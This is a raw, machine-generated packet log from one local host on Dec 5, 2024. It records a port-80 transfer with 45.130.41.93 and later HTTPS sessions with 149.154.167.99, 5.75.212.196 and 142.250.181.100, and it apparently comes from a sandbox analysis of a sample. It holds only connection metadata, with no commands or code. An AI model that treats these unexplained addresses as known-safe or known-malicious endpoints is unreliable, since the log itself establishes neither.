Dec 5, 2024 21:50:14.230071068 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.230101109 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.230756998 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.230992079 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.231038094 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.231714010 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.231754065 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.231919050 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.231966019 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.232398987 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.232450008 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.232620001 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.232661009 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.233206034 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.233248949 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.233321905 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.233361006 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.234010935 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.234066010 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.234230042 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.234308958 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.234894037 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.234951019 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.235094070 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.235321999 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.235690117 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.235738039 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.235811949 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.235867023 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.236488104 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.236541033 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.236653090 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.236692905 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.237268925 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.237346888 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.237430096 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.237643957 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.238084078 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.238181114 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.238245964 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.238416910 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.238897085 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.238965988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.238971949 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.239029884 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.239710093 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.239749908 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.239829063 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.239864111 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.240546942 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.240592957 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.240658998 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.240763903 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.241368055 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.241410971 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.241460085 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.241498947 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.242152929 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.242197990 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.242314100 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.242424011 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.242984056 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.243038893 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.243069887 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.243120909 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.243765116 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.243807077 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.243882895 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.243927956 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.244720936 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.244767904 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.244803905 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.244882107 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.245440960 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.245488882 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.245522976 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.245560884 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.246227980 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.246289968 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.246324062 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.246366978 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.247065067 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.247107029 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.247138023 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.247231960 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.247853041 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.247915983 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.247952938 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.247994900 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.248676062 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.248742104 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.248868942 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.248907089 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.249461889 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.249507904 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.249594927 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.249645948 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.250416040 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.250576019 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.250626087 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.250669956 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.251450062 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.251491070 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.251517057 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.251559019 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.251982927 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.252027988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.252058983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.252202988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.252748966 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.252796888 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.253125906 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.253227949 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.253531933 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.253566027 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.253633022 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.253674030 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.254359007 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.254410982 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.254427910 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.254528046 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.255160093 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.255204916 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.255300999 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.255337000 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.256025076 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.256072044 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.256108999 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.256159067 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.256807089 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.256848097 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.256968975 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.257116079 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.257666111 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.257705927 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.257708073 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.257749081 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.258563995 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:14.258606911 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:14.531142950 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:51:31.946962118 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:31.947010994 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:31.947091103 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:31.950160027 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:31.950174093 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.338689089 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.338792086 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:33.390321016 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:33.390337944 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.390541077 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.390590906 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:33.392230034 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:33.439337015 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.889720917 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.889743090 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.889780998 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.889801979 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:33.889828920 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:33.889878988 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:33.892085075 CET	49877	443	192.168.2.5	149.154.167.99
Dec 5, 2024 21:51:33.892102957 CET	443	49877	149.154.167.99	192.168.2.5
Dec 5, 2024 21:51:34.216912031 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:34.216948986 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:34.217008114 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:34.217284918 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:34.217293024 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.029855013 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.029930115 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.033724070 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.033735037 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.033942938 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.033993006 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.034490108 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.075340033 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.699713945 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.699765921 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.699781895 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.699811935 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.703551054 CET	49883	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.703566074 CET	443	49883	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.705581903 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.705617905 CET	443	49890	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:36.705713987 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.705907106 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:36.705919027 CET	443	49890	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:38.105731010 CET	443	49890	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:38.105892897 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.106614113 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.106623888 CET	443	49890	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:38.108664989 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.108669996 CET	443	49890	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:38.983943939 CET	443	49890	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:38.984023094 CET	443	49890	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:38.984050035 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.984074116 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.984294891 CET	49890	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.984308958 CET	443	49890	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:38.985692978 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.985734940 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:38.985800028 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.986011028 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:38.986028910 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:40.438911915 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:40.439018011 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:40.439481974 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:40.439493895 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:40.441407919 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:40.441414118 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:41.322877884 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:41.322899103 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:41.322957993 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:41.322976112 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:41.322976112 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:41.323014975 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:41.323204994 CET	49896	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:41.323220968 CET	443	49896	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:41.324744940 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:41.324781895 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:41.324862003 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:41.325094938 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:41.325104952 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:42.769438982 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:42.769522905 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:42.769970894 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:42.769984961 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:42.771933079 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:42.771939039 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:43.653294086 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:43.653321981 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:43.653383970 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:43.653402090 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:43.653436899 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:43.653893948 CET	49903	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:43.653913975 CET	443	49903	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:43.655920029 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:43.655987024 CET	443	49909	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:43.656066895 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:43.656275034 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:43.656291008 CET	443	49909	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:45.052352905 CET	443	49909	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:45.052546978 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.052920103 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.052934885 CET	443	49909	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:45.055030107 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.055037022 CET	443	49909	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:45.936151028 CET	443	49909	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:45.936218977 CET	443	49909	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:45.936239958 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.936266899 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.936415911 CET	49909	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.936430931 CET	443	49909	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:45.955068111 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.955121040 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:45.955200911 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.955487967 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:45.955503941 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:46.970432997 CET	49919	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:46.970474005 CET	443	49919	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:46.970603943 CET	49919	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:46.970779896 CET	49919	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:46.970803022 CET	443	49919	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:47.356334925 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:47.356722116 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:47.357392073 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:47.357407093 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:47.364414930 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:47.364418983 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:47.364470959 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:47.364479065 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:48.370620966 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:48.370688915 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:48.370703936 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:48.370739937 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:48.371874094 CET	49916	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:48.371886015 CET	443	49916	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:48.374453068 CET	443	49919	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:48.374536991 CET	49919	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:48.375343084 CET	49919	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:48.375356913 CET	443	49919	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:48.377418041 CET	49919	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:48.377434015 CET	443	49919	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:49.401086092 CET	443	49919	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:49.401150942 CET	443	49919	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:49.401232958 CET	49919	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:49.408999920 CET	49919	443	192.168.2.5	5.75.212.196
Dec 5, 2024 21:51:49.409024954 CET	443	49919	5.75.212.196	192.168.2.5
Dec 5, 2024 21:51:49.724574089 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:49.724617004 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:49.724673986 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:49.725080013 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:49.725091934 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:50.109788895 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.109838009 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:50.109900951 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.110459089 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.110472918 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:50.177248955 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.177285910 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:50.177355051 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.177685022 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.177697897 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:50.271286011 CET	49935	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.271348953 CET	443	49935	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:50.271425009 CET	49935	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.271691084 CET	49935	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:50.271708012 CET	443	49935	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.424864054 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.425306082 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.425324917 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.426769972 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.426835060 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.427849054 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.427958965 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.428081989 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.428087950 CET	443	49930	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.498533010 CET	49930	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.805222034 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.805495977 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.805516958 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.806592941 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.806674957 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.807027102 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.807097912 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.807168961 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.847342014 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.857331991 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.857366085 CET	443	49933	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.877011061 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.877362013 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.877396107 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.878479004 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.878550053 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.878952980 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.879021883 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.879131079 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.879139900 CET	443	49934	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.904185057 CET	49933	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.919790030 CET	49934	443	192.168.2.5	142.250.181.100
Dec 5, 2024 21:51:51.962124109 CET	443	49935	142.250.181.100	192.168.2.5
Dec 5, 2024 21:51:51.962373018 CET	49935	443	192.168.2.5	142.250.181.100
